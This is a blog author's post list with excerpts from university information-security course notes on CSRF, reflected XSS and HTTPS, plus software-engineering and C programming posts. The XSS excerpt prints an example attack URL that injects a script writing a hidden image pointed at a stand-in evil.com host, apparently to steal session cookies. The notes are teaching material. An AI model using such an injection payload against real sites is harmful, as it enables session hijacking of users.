自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(8)
  • 收藏
  • 关注

原创 2017中科大信息安全课程总结四

CSRF攻击1.攻击原理1.用户登录信任网站A2.验证通过,并在用户浏览器处产生A的Cookie3.用户在没有登录A网站的情形下,访问了黑客网站B4.B网站要求访问第三方站点A,发送一个请求5.根据B在第4步的请求,浏览器带着第2步产生的Cookie访问A6.这步在实际中并没有发生。但其等效于B向A发送请求。由于A并不知情请求的来源,它根据请求中带有的用户的Cookie,处理第5步的请求

2017-07-15 10:52:12 1326

原创 2017中科大信息安全课程总结三

反射型XSS攻击的原理攻击步骤1.用户正常登陆web应用程序,登陆成功后会得到一个会话信息的cookie Set-Cookie: sessId=xxxxxx2.攻击者将含有攻击代码的URL发送给受害者http://www.example.com?send=<script>document.write(<img height=0 width=0 src="http://www.evil.com

2017-07-10 21:31:18 857

原创 2017中科大信息安全课程总结二

HTML&CSS1.HTMLHTML 表单用于收集不同类型的用户输入。表单是一个包含表单元素的区域,表单元素时允许用户在表单中(比如:文本域、下拉列表、单选框、复选框等等)输入信息的元素。表单使用表单标签<form>定义。HTML负责网页的具体内容(结构),而CSS则修饰网页的表现形式(布局)。2.CSS2.1 CSS基本模型selector {property : value;}selector

2017-07-02 11:26:47 772

原创 2017中科大信息安全课程总结一

https部分1.https原理1.客户端(浏览器)的“证书管理器”里有“受信任的根证书颁发机构”,即对应的CA和服务器站点的证书。2.客户端向服务器端发送加密请求(如https://www.baidu.com)。3.服务器收到请求后,需要向客户端验证自己的身份。于是将自己的公钥发送给CA,CA用自己的私钥对服务器的公钥加密,生成数字签名。CA再将服务器的公钥、数字签名和服务器的一些其它消息整

2017-07-01 22:41:02 2337

原创 2017春高级软件工程学习总结

一、课程总结《高级软件工程》是本学期我的专业必选课, 很幸运能够在孟宁老师地指导下学习这门课。在此之前,我对软件工程这个概念的理解只是浮于表面,可以说是并不具备基本的软件工程的思想。在本科的所做的毕业设计中,主要做的工作是如何实现代码的编写,很少从软件工程的角度去看待实现的项目。但是随着学习的深入,发现在实际项目过程中,缺少软件工程的知识和思想会对实际项目开发产生很大影响,于是我决定认真地学习《高级

2017-06-16 15:01:06 561 1

翻译 WebGoat 开发者版安装教程

WebGoat: A deliberately insecure Web Application Important InformationThe WebGoat Lesson Server, is currently UNDER MAJOR DEVELOMENT.As of February 1st 2016, the version “7.0.1” is considered th

2017-06-10 19:13:53 1444 1

原创 Linux_C编程一站式学习(Chapter6的ex2)

题目编写函数diamond打印一个菱形。如果调用diamond(3, ‘*’),则打印: 如果调用diamond(5, ‘+’),则打印: 思路阐述1.首先要明白一点,这个程序设计的精髓在于如何控制printf来实现菱形的打印。2.观察给的两个范例,可以发现这样的规律:如果把每两个字符之间的距离假定为一个制表符’\t’的距离,那么对应每行输出的字符数(如’+’)和空格数的数目总和即为

2017-05-14 22:32:19 355

原创 库力索法半导体C++岗 笔试题

库力索法半导体C++岗笔试题1.题目#include<stdio.h>char * GetMemory(void){ char p[] = "hello world"; return p;}int main(){ char * str; str = GetMemory(); printf("%s",str); return 0;}Questio

2017-05-08 17:08:10 1318

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除